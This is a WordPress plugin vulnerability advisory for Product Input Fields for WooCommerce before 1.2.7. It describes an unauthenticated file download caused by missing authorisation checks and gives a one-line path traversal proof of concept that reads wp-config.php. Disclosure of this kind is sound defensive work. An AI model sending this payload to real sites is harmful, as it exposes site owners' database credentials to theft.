WordPress Plugin Vulnerabilities
Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
Description
The lack of authorisation checks in the handle_downloads() function, hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
Proof of Concept
/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Jerome Bruandet (nintechnet)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-08-03 (about 3 years ago)
Added
2020-08-03 (about 3 years ago)
Last Updated
2023-06-08 (about 11 months ago)